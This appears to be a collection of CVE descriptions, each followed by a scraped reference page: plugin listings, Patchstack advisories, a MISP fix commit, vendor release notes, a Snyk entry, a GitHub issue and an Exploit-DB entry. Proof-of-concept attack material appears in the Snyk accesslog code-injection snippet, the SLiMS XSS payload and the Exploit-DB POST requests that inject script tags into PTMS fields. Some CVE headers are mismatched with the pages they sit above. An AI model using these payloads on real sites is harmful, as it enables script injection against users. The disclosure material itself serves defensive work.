Multiple Authenticated Stored Cross-Site Scripting (XSS) vulnerabilities discovered in WP-DownloadManager WordPress plugin (versions <= 1.68.6). Vvulnerable parameters &download_path, &download_path_url, &download_page_url.

*   Details
*   Reviews
*   Support
*   Development

**General Usage**

1.  You Need To Re-Generate The Permalink `WP-Admin -> Settings -> Permalinks -> Save Changes`
2.  To embed a specific file to be downloaded into a post/page, use `[download id="2"]` where 2 is your file id.
3.  To embed multiple files to be downloaded into a post/page, use `[download id="1,2,3"]` where 1,2,3 are your file ids.
4.  To limit the number of embedded downloads shown for each post in a post stream, use the `stream_limit` option.
    1.  Example: `[download id="2" stream_limit="4"]`
    2.  This will only display the first 4 downloads for the post when rendered in a post stream, and display the full list of downloads when viewing the single post.
5.  To sort embedded downloads, use the `sort_by` and `sort_order` options.
    1.  Example: `[download id="2" sort_by="file_id" sort_order="asc"]`
    2.  This will sort the embedded downloads by file ID in ascending order.
    3.  Valid values for `sort_by` are: `file_id`, `file`, `file_name`, `file_size`, `file_date`, and `file_hits`
6.  To choose what to display within the embedded file, use `[download id="1" display="both"]` where 1 is your file id and both will display both the file name and file desccription, whereas name will only display the filename. Note that this will overwrite the “Download Embedded File” template you have in your Download Templates.
7.  To embed files as well as categories, use `[download id="1,2,3" category="4,5,6"]` where 1,2,3 are your file id and 4,5,6 are your category ids.
8.  If you are using Default Permalinks, the file direct download link will be `http://yoursite.com/index.php?dl_id=2`. If you are using Nice Permalinks, the file direct download link will be `http://yoursite.com/download/2/`, where yoursite.com is your WordPress URL and 2 is your file id.
9.  The direct download category link will be `http://yoursite.com/downloads/?dl_cat=3`, where yoursite.com is your WordPress URL, downloads is your Downloads Page name and 3 is your download category id.
10.  In order to upload the files straight to the downloads folder, the folder must be first CHMOD to 777. You can specify which folder to be the downloads folder in Download Options.
11.  You can configure the Download Options in `WP-Admin -> Downloads -> Download Options`
12.  You can configure the Download Templates in `WP-Admin -> Downloads -> Download Templates`

**Downloads Page**

1.  Go to `WP-Admin -> Pages -> Add New`
2.  Type any title you like in the post’s title area
3.  If you `ARE` using nice permalinks, after typing the title, WordPress will generate the permalink to the page. You will see an ‘Edit’ link just beside the permalink.
4.  Click ‘Edit’ and type in `downloads` in the text field and click ‘Save’.
5.  Type `[page_download]` in the post’s content area.
6.  You can also use `[page_download category="1"]`, this will display all downloads in Category ID 1.
7.  Click ‘Publish’

**Download Stats (With Widgets)**

1.  Go to `WP-Admin -> Appearance -> Widgets`
2.  The widget name is `Downloads`.

**Build Status****Development**

*   https://github.com/lesterchan/wp-downloadmanager

**Translations**

*   http://dev.wp-plugins.org/browser/wp-downloadmanager/i18n/

**Credits**

*   Plugin icon by Freepik from Flaticon
*   Icons courtesy of FamFamFam
*   Download Icon by Ryan Zimmerman

**Donations**

*   I spent most of my free time creating, updating, maintaining and supporting these plugins, if you really love my plugins and could spare me a couple of bucks, I will really appreciate it. If not feel free to use it without any obligations.

**To Display Most Downloaded**

    <?php if (function_exists('get_most_downloaded')): ?>
        <?php get_most_downloaded(); ?>
    <?php endif; ?>
    

*   The first value you pass in is the maximum number of files you want to get.
*   Default: `get_most_downloaded(10);`

**To Display Recent Downloads**

    <?php if (function_exists('get_recent_downloads')): ?>
        <?php get_recent_downloads(); ?>
    <?php endif; ?>
    

*   The first value you pass in is the maximum number of files you want to get.
*   Default: `get_recent_downloads(10);`

**To Display Downloads By Category**

    <?php if (function_exists('get_downloads_category')): ?>
        <?php get_downloads_category(1); ?>
    <?php endif; ?>
    

*   The first value you pass in is the category id.
*   The second value you pass in is the maximum number of files you want to get.

Default: `get_downloads_category(1, 10);`

![](https://secure.gravatar.com/avatar/ae8abe6908e0878b6fe204f03ee790de?s=60&d=retro&r=g)

I change my rating because it refers to another plugin.

![](https://secure.gravatar.com/avatar/a19b8601e2278f6656e7b95d5d4f5d37?s=60&d=retro&r=g)

NOT ONLY THAT THEY DID NOT REFUND THE MONEY THAT THEY WERE LEGALLY OBLIGATED TO DO DURING 14DAYS PERIOD AFTER PURCHASING, AFTER THEIR PLUGINS HAD PROBLEMS TO FUNCTION, THEY asked for logins to fix it and they messed the whole website up. Will never do business again with them they just take your money and run away, Plugins are coded by idiots, it's impossible to combine it to modern plugins or themes, they keep telling you to buy more plugins to make it work as it should. Seriously stay away from them.

![](https://secure.gravatar.com/avatar/4c91fec0ac6881ffaf274f0e5093f767?s=60&d=retro&r=g)

there is not support. After a month still waiting for support.

![](https://secure.gravatar.com/avatar/91d2cccdd3a4eb65db98b1b457a64a24?s=60&d=retro&r=g)

Lightweight plugin that does exactly what it says. Shortcodes and Templates are very customisable. Remember to create a folder and upload your files via FTP first, then update Permalinks. After that works perfectly.

![](https://secure.gravatar.com/avatar/8e29e5f8cea82951e900f972e758d44f?s=60&d=retro&r=g)

Excellent This is the lightest and most efficient download plugin Be sure to use this plugin

![](https://secure.gravatar.com/avatar/59e0e1a1f660f11279af718197534ca1?s=60&d=retro&r=g)

能加一个下载统计日志吗？ 统计下载的用户，IP，国籍，地区，之类的 还有，没有权限的，点击提示无权下载，这个可不可以自定义一下，改成Elementor弹窗模板，支持Elementor编辑器

Read all 34 reviews

“WP-DownloadManager” is open source software. The following people have contributed to this plugin.

Contributors

*   ![](https://secure.gravatar.com/avatar/8fdd1c4a03682246e45b8b15cd08b854?s=32&d=mm&r=g) Lester Chan

**Version 1.68.8**

*   FIXED: Download Categories not parsing properly.

**Version 1.68.7**

*   FIXED: esc\_attr()

**Version 1.68.6**

*   NEW: Add filter wp\_downloadmanager\_file\_extension\_image and wp\_downloadmanager\_file\_extension\_images\_path
*   FIXED: XSS in download-manager.php. Props to Ngo Van Thien and Patchstack.

**Version 1.68.5**

*   FIXED: Validation of remote file to prevent Server Side Request Forgery (SSRF) as reported by WordPress Plugin Review Team

**Version 1.68.4**

*   NEW: Bump WordPress 5.4
*   FIXED: Unix timestamp sorting order

**Version 1.68.3**

*   NEW: Bump WordPress 5.3

**Version 1.68.2**

*   NEW: WordPress 4.7
*   FIXED: Pagination not working
*   FIXED: Remove eregi
*   FIXED: Remote file URL will get be broken, if the remote file URL gets really ugly

**Version 1.68.1**

*   NEW: Uses wp\_kses\_post() for better field sanitization

**Version 1.68**

*   NEW: Use translate.wordpress.org to translate the plugin
*   FIXED: Some WP doesn’t have wp\_user\_level because it has been deprecated

**Version 1.67**

*   FIXED: Notices

**Version 1.66**

*   FIXED: Notices in Widget Constructor for WordPress 4.3

**Version 1.65**

*   FIXED: Integration with WP-Stats

**Version 1.64**

*   NEW: Supports WordPress MultiSite Network Activate
*   NEW: Uses native WordPress uninstall.php
*   FIXED: Notices

**Version 1.63**

*   NEW: Added %FILE\_EXT% template variable that output the file extension
*   FIXED: Editor button was outputting the wrong shortcode.
*   FIXED: ReferenceError: downloadssEdL10n is not defined if TinyMCE 4.0 is loaded outside the Add/Edit Posts/Pages.
*   FIXED: Added backward compatibility with \[download=1\] in order not to break older downloads.

**Version 1.62**

*   NEW: Uses Dash Icons
*   NEW: Supports TinyMCE 4.0 For WordPress 3.9
*   NEW: Added sorting to embedded downloads. Props ksze.
*   NEW: You can now choose to display file sizes in either binary base or decimal base (i.e. KiB vs KB), using either `%FILE_SIZE` or `%FILE_SIZE_DEC`; `%CATEGORY_SIZE` and `%TOTAL_SIZE` also have their `_DEC` counterparts.. Props ksze.

**Version 1.61**

*   FIXED: Added nonce to Options. Credits to Charlie Eriksen via Secunia SVCRP.

**Version 1.60 (08-11-2010)**

*   NEW: Display File ID In Message After Adding A File
*   FIXED: Bug In Remote File With Using Nice Permalink and File Name

CVE-2022-25605: WP-DownloadManager

Authenticated (author or higher user role) Stored Cross-Site Scripting (XSS) vulnerability discovered in MaxGalleria WordPress plugin (versions 6.2.5).

**maxgalleria**

**Software**

**MaxGalleria**

**Vulnerable Versions**

**<= 6.2.5**

**Fixed in version**

**CVE**

**CVE-2022-25603**

**References**

**Credits**

**Classification**

**Cross Site Scripting (XSS)**

**OWASP Top 10**

**A7: Cross-Site Scripting (XSS)**

**Disclosure Date**

**2022-02-02**

**CVSS 3.0 score**

**Requires author or higher role user authentication.**

**Plugin does not exist, is not supported or discontinued.**

**Are your websites subject to this vulnerability?**

**Details**

**Stored Cross-Site Scripting (XSS) vulnerability discovered by Ngo Van Thien (Patchstack Red Team project) in WordPress MaxGalleria plugin (versions <= 6.2.5).**

**Solution**

**This plugin has been closed as of February 1, 2022 and is not available for download. This closure is temporary, pending a full review.**

**Found a vulnerability that puts your sites at risk?**

**Found a vulnerability? Help us secure the web and join our community of ethical hackers.**

**Are you the developer of this software? Hire our researchers for a thorough security audit.**

CVE-2022-25603: WordPress MaxGalleria plugin <= 6.2.5 - Stored Cross-Site Scripting (XSS) vulnerability - Patchstack

Authenticated (contributor of higher user role) Stored Cross-Site Scripting (XSS) vulnerability discovered in WordPress Price Table plugin (versions <= 0.2.2).

**pricetable**

**Software**

**Price Table**

**Vulnerable Versions**

**<= 0.2.2**

**Fixed in version**

**CVE**

**CVE-2022-25604**

**References**

**Credits**

**Classification**

**Cross Site Scripting (XSS)**

**OWASP Top 10**

**A7: Cross-Site Scripting (XSS)**

**Disclosure Date**

**2022-01-27**

**CVSS 3.0 score**

**Requires contributor or higher role user authentication.**

**Plugin does not exist, is not supported or discontinued.**

**Are your websites subject to this vulnerability?**

**Details**

**Stored Cross-Site Scripting (XSS) vulnerability discovered by Ngo Van Thien in WordPress Price Table plugin (versions <= 0.2.2).**

**Solution**

**Deactivate and delete. This plugin has been closed as of January 27, 2022 and is not available for download. This closure is temporary, pending a full review.**

**Found a vulnerability that puts your sites at risk?**

**Found a vulnerability? Help us secure the web and join our community of ethical hackers.**

**Are you the developer of this software? Hire our researchers for a thorough security audit.**

CVE-2022-25604: WordPress Price Table plugin <= 0.2.2 - Stored Cross-Site Scripting (XSS) vulnerability - Patchstack

An issue was discovered in MISP before 2.4.156. A malicious site administrator could store an XSS payload in the custom auth name. This would be executed each time the administrator modifies a user.

Permalink

Browse files

fix: \[security\] stored XSS in the user add/edit forms

\- a malicious site administrator could store an XSS payload in the custom auth name which would be executed each time the administrator modifies a user

- as reported by Ianis BERNARD - NATO Cyber Security Centre

*   Loading branch information

![@iglocska](https://avatars.githubusercontent.com/u/3668672?s=40&v=4)

1 parent dc63cb7 commit 61d4d3670593b78e4dab7a11eb620b7a372f30e6

Showing with **2 additions** and **2 deletions**.

1.  +1 −1 app/View/Users/admin\_add.ctp
2.  +1 −1 app/View/Users/admin\_edit.ctp

@@ -13,7 +13,7 @@

$password = false;

} else {

$userType = Configure::read('Plugin.CustomAuth\_name') ? Configure::read('Plugin.CustomAuth\_name') : 'External authentication';

echo $this\->Form\->input('external\_auth\_required', array('type' => 'checkbox', 'label' => $userType . ' user'));

echo $this\->Form\->input('external\_auth\_required', array('type' => 'checkbox', 'label' => h($userType) . ' user'));

}

echo sprintf(

'<div class="clear"></div><div %s>%s</div>',

@@ -16,7 +16,7 @@

$password = false;

} else {

$userType = Configure::read('Plugin.CustomAuth\_name') ? Configure::read('Plugin.CustomAuth\_name') : 'External authentication';

echo $this\->Form\->input('external\_auth\_required', array('type' => 'checkbox', 'label' => $userType . ' user'));

echo $this\->Form\->input('external\_auth\_required', array('type' => 'checkbox', 'label' => h($userType) . ' user'));

}

echo sprintf(

'<div class="clear"></div><div %s>%s</div>',

**0 comments on commit `61d4d36`**

Please sign in to comment.

CVE-2022-27244: fix: [security] stored XSS in the user add/edit forms · MISP/MISP@61d4d36

Authenticated (admin or higher user role) Stored Cross-Site Scripting (XSS) vulnerability discovered in AMP for WP – Accelerated Mobile Pages WordPress plugin (versions <= 1.0.77.31).

*   Details
*   Reviews
*   Installation
*   Support
*   Development

AMP for WP automatically adds Accelerated Mobile Pages (Google AMP Project) functionality to your WordPress site. AMP makes your website faster for Mobile visitors.

What’s New in this Version? | Priority Support | View Demo | Screenshots | Community

**Extensions**  
Some useful extensions to extend AMP features, check AMP Adsense Support, Contact Form 7 Support, Email Opt-in Support and Call To Action Support. To view more, go to our Extensions page.

**Support**  
We try our best to provide support on WordPress.org forums. However, We have a special community support where you can ask us questions and get help about your AMP related questions. Delivering a good user experience means a lot to us and so we try our best to reply each and every question that gets asked.

**Bug Reports**  
Bug reports for AMP for WP are welcomed on GitHub. Please note GitHub is _not_ a support forum, and issues that aren’t properly qualified as bugs will be closed.

**Features:**

*   NEW – Gutenberg Support
*   NEW – Divi and Elementor Support More Info
*   NEW – GDPR Compliance
*   NEW – Google PageSpeed Optimization with SSR (Server Side Rendering)
*   NEW – CSS Optimization (Tree Shaking) – This will automatically remove all the unused CSS from your AMP pages
*   NEW – Google Font API and Local Fonts Support For All Designs
*   Out of the box compatibility for Yoast SEO, All in One Seo, Rank Math, Genesis, SEOPress, Bridge Qode SEO, The SEO Framework, SmartCrawl and Squrilly SEO Plugin.
*   Introducing Page Builder 3.0 for AMP! Learn More & Video
*   New Default Theme for AMP called Swift
*   3 Pre-built AMP Layouts for Business websites and landing pages
*   OneSignal and TruePush Push Notifications integration
*   Advanced WooCommerce Support More Info
*   AMP Plugins Manager – Which allows you to disable a specific plugin functionality only in the AMP version
*   Structured Data Options
*   Page Break / NextPage (Pagination) Support
*   Contact Form 7 Support More Info
*   Graviry Form Support More Info
*   Caldera Form Support More Info
*   Ninja Form Support More Info
*   Facebook Comments Support
*   Github Gist Support
*   Email Opt-in Subscription form support in AMP added
*   Call to Action boxes and notification bars
*   9 Advertisement sizes – 2 More AD slots added recently
*   Comments Forms in AMP.
*   Native AMP Search functionality.
*   Design 3 Watch the Video Overview
*   Disqus Comments Support
*   Vuukle Comments Support
*   Spot.IM Comments Support
*   Google Tag Manager Support
*   Page, Category & Tags Support Added
*   Custom AMP Editor – Which allows you to override your Content that you had written in Post or page, so you can add the different content just for AMP.
*   Mobile Redirection – More than 50% of your traffic is from mobile and you aren’t doing anything to improve their user experience, which means you are falling behind on SEO and it can result in lower SERPS. Lightning fast mobile version means faster User experience means more engagement which directly results in the lower bounce rate.
*   Custom Post Type Support
*   Custom Taxonomies Support
*   Star Ratings
*   Drag & Drop Page builder Added
*   4 Designs for AMP
*   AMP WooCommerce Support
*   Switch on/off Support for Pages & Posts on AMP
*   Translation Panel & RTL
*   Internal AMP linking – You can browse AMP pages internally
*   Related posts below the post
*   Recent Comments list
*   Automatically integrate AMP to your website.
*   Google Adsense (AMP-AD) Support with 6 different Ad slots across the layout! The First Plugin to have this capability.
*   Built in MGID Ads Support with 6 different ad slots.
*   Google Analytics Support.
*   User Friendly Theme Options Panel.
*   Unlimited Color Scheme.
*   Image Logo Upload.
*   Supports Posts and Pages and other custom post types.
*   Proper rel canonical tags which means that Google know the original page.
*   Overlay Navigation Menu bar.
*   Social Sharing in the Single.
*   Sexy Design.
*   Separate WordPress Menu for AMP version.
*   Page builder & Shortcodes Compatibility.
*   Carousel support for Gallery.
*   Better Image stretching and resizing.
*   Youtube Video Embed Support.
*   Vine Embed Support.
*   Twitter oembed Support.
*   Instagram Embed Support.
*   Facebook Video Embed Support.
*   RTL Support
*   Custom AMP FrontPage
*   Notifications
*   Alexa Metrics, Chartbeat, Hi-stats, Yandex Metrika, Piwik, Segment.com, StatCounter, Effective Measure and comScore Builtin Support
*   Incontent & DoubleClick Support
*   Great Support & Active Development.
*   Widgets & WooCommerce
*   Breadcrumb Support added
*   Facebook Instant Articles Support Added
*   AMP Installation Wizard that makes it easy to setup for new users.
*   Category base remover support
*   Tag base remover support
*   Addthis Sharing Support
*   Infinite Scroll Support
*   Photo Gallery by 10Web Support
*   12 New Social Media Integrations added (Reddit, Tumblr, Telegram, Digg, StumbleUpon, Wechat, Viber, Hatena Bookmarks, Pocket, Yummly, MeWe, Flipboard)
*   AMP Theme Framework Core Support Added. You can now create AMP templates of your own in just minutes. **More**
*   NEW – Make AMP & Non-AMP Same with just one click!
*   NEW – Allows you to use AMP as primary website!

**JOIN CHAT GROUP COMMUNITY**: Purpose of this group is to get proper suggestions and feedback from plugin users and the community so that we can make the plugin even better.

**Getting Started:**

**1\. User Documentation:** The AMP for WordPress plugin is easy to setup but we have some tutorials and guides prepared for you which will help you dive deep with the plugin.

**2\. Developer Docs:** We have created special documentations for developers and semi technical users who are willing to modify the plugin according to their own needs.

**3\. Support:** We try our best to provide support on WordPress.org forums. However, We have a special community support where you can ask us questions and get help about your AMP related questions. Delivering a good user experience means a lot to us and so we try our best to reply each and every question that gets asked.

**4\. Premium Support:** We will personally take care that your website’s AMP version is perfectly validated. We will make sure that your AMP version gets approved and indexed by Google Webmaster Tools properly and we will even keep an eye on AMP updates from Google and implement them into your website.

**Credits**

Some code used in this plugin was forked from ‘AMP for WordPress’ plugin https://wordpress.org/plugins/amp/ – License URI: http://www.gnu.org/licenses/gpl-2.0.html.  
Mobile & Tablet detection library used https://github.com/serbanghita/Mobile-Detect – License URI: https://github.com/serbanghita/Mobile-Detect/blob/master/LICENSE.txt  
PHP CSS Parser library used https://github.com/sabberworm/PHP-CSS-Parser – License URI: https://github.com/sabberworm/PHP-CSS-Parser#license (PHP-CSS-Parser is freely distributable under the terms of an MIT-style license.)  
AMP Optimizer library used https://github.com/ampproject/amp-toolbox/tree/main/packages/optimizer – License URI: https://github.com/ampproject/amp-toolbox#license (AMP Toolbox is made by the AMP Project, and is licensed under the Apache License, Version 2.0.)

**Visit Help area for the Documentation:**

**Visit Help area for the Documentation:**

**Can I add analytics?**

Yes, you easily can. In fact, we have support for 12 Analytics companies. Including Google Analytics, Facebook Pixel, StatCounter, QuantCast, Chartbeat, comScore to list a few. Also, we have Google Tag Manager (GTM) support as well.

**Can I add Ads in my AMP pages?**

Yes, you can. We have 6 ad placement slots that are built in and strategically placed to get maximum views. Also, we have an extension from which you can insert ads between the content, will get more ad slots and also add custom banners to all the available slots.

**Can I extend/Change the AMP design, so it suits my needs?**

Yes, you easily can. We have created this plugin in such a way that it can easily be extended. Check out our AMP Theme Framework

**Do you have any prebuilt designs?**

Yes, we have AMP themes section where we have free and paid designs available. We also update it regularly. You can check it out our AMP Themes

**I’m a developer and I want to add custom functionality for a client, can I do that?**

Yes, of course. This plugin is very developer friendly, we have lots of hooks and filters that you can use to extend and customize according to the requirements. Also, we have developer documentation which we update regularly.

**How do I report bugs and suggest new features?**

You can report the bugs here

**Will you Add New features to my request?**

Yes, Absolutely! We would suggest you send your feature request by creating an issue in Github . It helps us organize the feedback easily.

**How do I get in touch?**

You can contact us from here

![](https://secure.gravatar.com/avatar/07a56c90a427c263a8869831ac3d4dbd?s=60&d=retro&r=g)

![](https://secure.gravatar.com/avatar/77c97f0a2554cda5665547de84627aa7?s=60&d=retro&r=g)

![](https://secure.gravatar.com/avatar/a9ae7d27e349e44228648b192d446441?s=60&d=retro&r=g)

![](https://secure.gravatar.com/avatar/55d75b898bf4f3d2e17b0d039bad6ad1?s=60&d=retro&r=g)

![](https://secure.gravatar.com/avatar/92979f9c6fff838534ae94cc98d95b1c?s=60&d=retro&r=g)

![](https://secure.gravatar.com/avatar/6b099f0b6c687abe2e8b3a8ae45d1ac1?s=60&d=retro&r=g)

Cheaters, they offered the discount on their pricing page. But their discount disappeared in cart. i tried it many times, no discount was applied on my order. i contacted many times the support team, but every time they offers me 50% discount on new purchase to compensate, they are not ready to return my extra charged money. moreover, plugin is full of waste, because of their unprofessional services.

Read all 1,208 reviews

“AMP for WP – Accelerated Mobile Pages” is open source software. The following people have contributed to this plugin.

Contributors

**1.0.77.38 (7th March 2022)**

*   Improvements: Added The Publisher Desk Support #5213
*   Fixed: Displaying a blank white screen when embed URLs are used #5193

1.0.77.37.1 (4TH March 2022)  
\* Improvements: Added new infinite scrolling experience #4791  
\* Fixed: The links in embed URLs are not clickable #5193

**1.0.77.37 (2nd March 2022)**

*   Improvements: Added feedback form with auto email system #5223
*   Improvements: Added new infinite scrolling experience #4791
*   Improvements: Added An option to add lang\_ and privacyMode values in Quantcast #5206
*   Improvements: Added FireWork compatibility #5210
*   Fixed: AMP autocomplete tag is not working #5217
*   Fixed: Autoplay functionality not working in video module #5219
*   Fixed: Fonts loading twice in Global font family #5220
*   Fixed: Unable to connect to Matomo analytics #5221

**1.0.77.36 (18th February 2022)**

*   Fixed: If the server-side cache is aggressive then the pagination URL with ?amp=1 is redirecting to non-AMP #5208
*   Fixed: Errror getting in featured-image.php, on line 77 #5207
*   Fixed: Need to keep the mobile redirection filter outside of any condition #5216

Full changelog available at changelog.txt

CVE-2021-23150: AMP for WP – Accelerated Mobile Pages

Rapid7 Nexpose versions 6.6.129 and earlier suffer from a reflected cross site scripting vulnerability, within the shared scan configuration component of the tool. With this vulnerability an attacker could pass literal values as the test credentials, providing the opportunity for a potential XSS attack. This issue is fixed in Rapid7 Nexpose version 6.6.130.

*   We fixed an issue where some scan engine updates were being skipped. This caused some engines to be out of sync with their updates.
    
*   In Shared Scan Credential Configuration, test credentials no longer allow literal values to be passed, which could have provided a potential opportunity for an XSS attack. Thank you to Aleksey Solovev for disclosing this issue.
    
*   An issue which prevented users from deleting custom policies when arf files were corrupted or missing has been fixed. The policy deletion will now complete and a warning will be displayed in the console log, highlighting the arf files.
    
*   Goals dashboard cards failed to load correctly, which caused the entire dashboard not to load. Dashboards now successfully load in this case.
    
*   We fixed an issue which caused some assets with the InsightVM Agent installed to fail to remediate vulnerabilities in the Console UI if the Agent data is never imported.
    
*   We fixed an issue that was causing errors in the console and engine communications to be suppressed.
    
*   We fixed F+ for Rule 4.2.9 in CIS IBM AIX 7.1 Benchmark 1.1.0 and for some rules in the Apache http 2.4 policy v1.3.0.
    
*   We fixed an issue when asserting network interfaces.
    
*   We fixed an issue that caused scans to be slow to start and consoles to lose connectivity to shared engines if a scan contained large IPv6 address ranges.

CVE-2022-0758: Nexpose Release Notes

All versions of package accesslog are vulnerable to Arbitrary Code Injection due to the usage of the Function constructor without input sanitization. If (attacker-controlled) user input is given to the format option of the package's exported constructor function, it is possible for an attacker to execute arbitrary JavaScript code on the host that this package is being run on.

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about common security vulnerabilities in an interactive lesson.

Start learning

*   **snyk-id**
    
    SNYK-JS-ACCESSLOG-2312099
    
*   **published**
    
    27 Feb 2022
    
*   **disclosed**
    
    8 Dec 2021
    
*   **credit**
    
    OmniTaint
    

**How to fix?**

There is no fixed version for `accesslog`.

**Overview**

accesslog is a simple common/combined access log middleware

Affected versions of this package are vulnerable to Arbitrary Code Injection due to the usage of the `Function` constructor without input sanitization. If (attacker-controlled) user input is given to the format option of the package's exported constructor `function`, it is possible for an attacker to execute arbitrary JavaScript code on the host that this package is being run on.

**PoC**

    var accesslog = require('accesslog');
    var handler = accesslog({
      format: `\\\" + console.log('XSS');//`,
    });
    var req = {};
    var res = {
       end: function() {},
     };
     handler(req, res, function() {});
     res.end();

CVE-2022-25760: Arbitrary Code Injection in accesslog | CVE-2022-25760 | Snyk

Slims9 Bulian 9.4.2 is affected by Cross Site Scripting (XSS) in /admin/modules/system/custom_field.php.

**Describe the bug**  
Storage type xss exists in Custom Field Editor in /admin/modules/system/custom\_field.php file. There is no effective defense against the NOTE field, leading to cross-site script attacks.

**To Reproduce**  
Steps to reproduce the behavior:  
Storage type xss exists in Custom Field Editor in /admin/modules/system/custom\_field.php file. There is no effective defense against the NOTE field, leading to cross-site scripting attacks.  
Administrator login "system" add new "field> fill in cross-site scripting in the NOTE field `(example:'"><svg/onload=alert(document.domain)>)`  
It will take effect after saving.

**Expected behavior**  
You can insert js scripts to attack.

**Screenshots**  
![3](https://user-images.githubusercontent.com/18564938/147060823-4a8328b5-9ea5-400a-80d2-48c4a8828895.png)  
![4](https://user-images.githubusercontent.com/18564938/147060883-f5af4b94-3587-4dee-9e94-45415050b3eb.png)

**Desktop :**

*   OS: \[MacBook M1\]
*   Browser \[Chrome\]
*   Version \[96.0.4664.110\]

CVE-2021-45792: [Security Bug]Stored cross-site script attacks（xss） · Issue #122 · slims/slims9_bulian

A stored cross-site scripting (XSS) vulnerability in /ptms/?page=user of Online Project Time Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the user name field.

    # Exploit Title: Online Project Time Management System 1.0 - Multiple Stored XSS (Authenticated)
    # Date: 19/01/2022
    # Exploit Author: Felipe Alcantara (Filiplain)
    # Vendor Homepage: https://www.sourcecodester.com/
    # Software Link: https://www.sourcecodester.com/php/15136/online-project-time-management-system-phpoop-free-source-code.html
    # Version: 1.0
    # Tested on: Kali Linux
    # Description: Stored XSS in multiple fields...
    
    # Steps to reproduce (with employee Access)
    
    # Log in as an employee
    # Go to : http://localhost/ptms/?page=user
    # Add XSS payload to any field of the user's name.
    #Click Update
    
    
    =================
    POST /ptms/classes/Users.php?f=save_employee HTTP/1.1
    Host: localhost
    Content-Length: 1339
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) 
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvsLkAfaBC64Uzoak
    Origin: http://localhost
    Referer: http://localhost/ptms/?page=user
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: PHPSESSID=r9ds0ep1v3q2lom422v9e2vcfm
    Connection: close
    
    ------WebKitFormBoundaryvsLkAfaBC64Uzoak
    Content-Disposition: form-data; name="id"
    
    4
    ------WebKitFormBoundaryvsLkAfaBC64Uzoak
    Content-Disposition: form-data; name="code"
    
    2022-0003
    ------WebKitFormBoundaryvsLkAfaBC64Uzoak
    Content-Disposition: form-data; name="generated_password"
    
    
    ------WebKitFormBoundaryvsLkAfaBC64Uzoak
    Content-Disposition: form-data; name="firstname"
    
    Mark
    ------WebKitFormBoundaryvsLkAfaBC64Uzoak
    Content-Disposition: form-data; name="middlename"
    
    <script>alert("XSS_TEST")</script>
    ------WebKitFormBoundaryvsLkAfaBC64Uzoak
    Content-Disposition: form-data; name="lastname"
    
    Cooper
    ------WebKitFormBoundaryvsLkAfaBC64Uzoak
    Content-Disposition: form-data; name="gender"
    
    Male
    ------WebKitFormBoundaryvsLkAfaBC64Uzoak
    Content-Disposition: form-data; name="department"
    
    IT Department
    ------WebKitFormBoundaryvsLkAfaBC64Uzoak
    Content-Disposition: form-data; name="position"
    
    Department Manager
    ------WebKitFormBoundaryvsLkAfaBC64Uzoak
    Content-Disposition: form-data; name="email"
    
    mcooper@sample.com
    ------WebKitFormBoundaryvsLkAfaBC64Uzoak
    Content-Disposition: form-data; name="password"
    
    ------WebKitFormBoundaryvsLkAfaBC64Uzoak
    Content-Disposition: form-data; name="img"; filename=""
    Content-Type: application/octet-stream
    
    ------WebKitFormBoundaryvsLkAfaBC64Uzoak--
    =================
    
    -----------------------------------------------------------------------------
    
    # Steps to reproduce (with Admin access)
    
    # Log in to the admin panel
    # Go to : http://localhost/ptms/admin/?page=system_info
    # Add XSS payload to the 'System Name' field
    #Click Update
    
    
    =================
    
    POST /ptms/classes/SystemSettings.php?f=update_settings HTTP/1.1
    Host: localhost
    Content-Length: 603
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) 
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCibB6pEzThjb4Zcq
    Origin: http://localhost
    Referer: http://localhost/ptms/admin/?page=system_info
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: PHPSESSID=r9ds0ep1v3q2lom422v9e2vcfm
    Connection: close
    
    ------WebKitFormBoundaryCibB6pEzThjb4Zcq
    Content-Disposition: form-data; name="name"
    
    Online Project Time Management System - PHP <script>alert("XSS")</script>
    ------WebKitFormBoundaryCibB6pEzThjb4Zcq
    Content-Disposition: form-data; name="short_name"
    
    PTMS - PHP
    ------WebKitFormBoundaryCibB6pEzThjb4Zcq
    Content-Disposition: form-data; name="img"; filename=""
    Content-Type: application/octet-stream
    
    
    ------WebKitFormBoundaryCibB6pEzThjb4Zcq
    Content-Disposition: form-data; name="cover"; filename=""
    Content-Type: application/octet-stream
    
    
    ------WebKitFormBoundaryCibB6pEzThjb4Zcq--
    
    =================

CVE-2022-26295: Offensive Security’s Exploit Database Archive

CKEditor4 is an open source what-you-see-is-what-you-get HTML editor. CKEditor4 prior to version 4.18.0 contains a vulnerability in the `dialog` plugin. The vulnerability allows abuse of a dialog input validator regular expression, which can cause a significant performance drop resulting in a browser tab freeze. A patch is available in version 4.18.0. There are currently no known workarounds.

Mar 16/2022

**Security Updates:**

*   Fixed an XSS vulnerability in the core module reported by GitHub Security Lab team member Kevin Backhouse.
    
    Issue summary: The vulnerability allowed to inject malformed HTML bypassing content sanitization, which could result in executing a JavaScript code. See CVE-2022-24728 for more details.
    
*   Fixed a Regular expression Denial of Service (ReDoS) vulnerability in dialog plugin discovered by the CKEditor 4 team during our regular security audit.
    
    Issue summary: The vulnerability allowed to abuse a dialog input validator regular expression, which could cause a significant performance drop resulting in a browser tab freeze. See CVE-2022-24729 for more details.
    

You can read more details in the relevant security advisory and contact us if you have more questions.

**An upgrade is highly recommended!**

**Highlights:**

Web Spell Checker ended support for WebSpellChecker Dialog on December 31st, 2021. This means the plugin is not supported any longer. Therefore, we decided to deprecate and remove the WebSpellChecker Dialog plugin from CKEditor 4 presets.

We strongly encourage everyone to choose one of the other available spellchecking solutions - Spell Check As You Type (SCAYT) or WProofreader.

Fixed issues:

*   #5097: \[Chrome\] Fixed: Incorrect conversion of points to pixels while using CKEDITOR.tools.convertToPx().
*   #5044: Fixed: select elements with multiple attribute had incorrect styling. Thanks to John R. D'Orazio!

Other changes:

*   #5093: Deprecated and removed WebSpellChecker Dialog from presets.
